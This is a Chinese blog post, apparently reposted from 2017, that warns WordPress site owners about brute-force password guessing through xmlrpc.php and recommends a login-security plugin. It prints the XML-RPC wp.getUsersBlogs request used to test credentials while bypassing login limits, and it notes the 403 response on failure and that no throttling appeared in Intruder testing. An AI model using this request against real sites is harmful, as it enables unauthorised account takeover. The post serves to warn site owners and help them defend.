• 欢迎访问奇跡の海网站,本站不上传任何资源,所有资源均来自于网络,欢迎加入奇跡の海~! QQ群
  • 本站下载资源为网络上收集整理而来,并且以计算机技术研究交流为目的,版权归原作者所有,仅供大家参考,学习,不存在任何商业目的与商业用途.
  • 本站系统镜像均来自于官方原版,ed2k可视为P2P下载链接。所有操作系统默认均为试用版,如有正版密钥可以有效激活,本站不提供任何激活和相关服务。

利用xmlrpc.php对WordPress进行暴力破解攻击

WP其他 奇跡の海 1年前 (2017-06-02) 235次浏览 已收录 0个评论 扫描二维码

近几天 wordpress 社区的小伙伴们反映遭到了利用 xmlrpc.php 进行暴力破解的攻击。利用 xmlrpc.php 提供的接口尝试猜解用户的密码,可以绕过 wordpress 对暴力破解的限制。已经发现了大规模的利用,启用了 xmlrpc 的同学需要尽快修复。安装或者升级Login Security Solutin插件

通常 wordpress 登录接口都是做了防暴力破解防护的,比如 freebuf 的登录只能有尝试 5 次。

这种利用 xmlrpc.php 的攻击可以绕过这些限制。攻击的方式直接 POST 以下数据到 xmlrpc.php.
<span class="pun"><?</span><span class="pln">xml version</span><span class="pun">=</span><span class="str">"1.0"</span><span class="pln"> encoding</span><span class="pun">=</span><span class="str">"iso-8859-1"</span><span class="pun">?></span>
<span class="pun"><</span><span class="pln">methodCall</span><span class="pun">></span><span class="pln">
  </span><span class="pun"><</span><span class="pln">methodName</span><span class="pun">></span><span class="pln">wp</span><span class="pun">.</span><span class="pln">getUsersBlogs</span><span class="pun"></</span><span class="pln">methodName</span><span class="pun">></span><span class="pln">
  </span><span class="pun"><</span><span class="pln">params</span><span class="pun">></span><span class="pln">
   </span><span class="pun"><</span><span class="pln">param</span><span class="pun">><</span><span class="pln">value</span><span class="pun">></span><span class="pln">username</span><span class="pun"></</span><span class="pln">value</span><span class="pun">></</span><span class="pln">param</span><span class="pun">></span><span class="pln">
   </span><span class="pun"><</span><span class="pln">param</span><span class="pun">><</span><span class="pln">value</span><span class="pun">></span><span class="pln">password</span><span class="pun"></</span><span class="pln">value</span><span class="pun">></</span><span class="pln">param</span><span class="pun">></span><span class="pln">
  </span><span class="pun"></</span><span class="pln">params</span><span class="pun">></span>
<span class="pun"></</span><span class="pln">methodCall</span><span class="pun">></span>

其中 username 字段是预先收集的用户名。password 是尝试的密码。关于 getUsersBlogs 接口的更多信息可以参考官方的指南。如果密码正确,返回为:

密码错误返回为 403:

使用 intruder 进行测试,发现服务端没有进行限制。


版权声明:本站所有文章和资源使用BY-NC-SA协议授权发布 , 转载应当以相同方式注明文章来自“SeaOMC.COM->利用 xmlrpc.php 对 WordPress 进行暴力破解攻击!在下边可以分享本文哦!
本文最后更新于2018年3月14日,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
喜欢 (0)
[]
分享 (0)
奇跡の海
关于作者:
一个WordPress菜鸟!
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址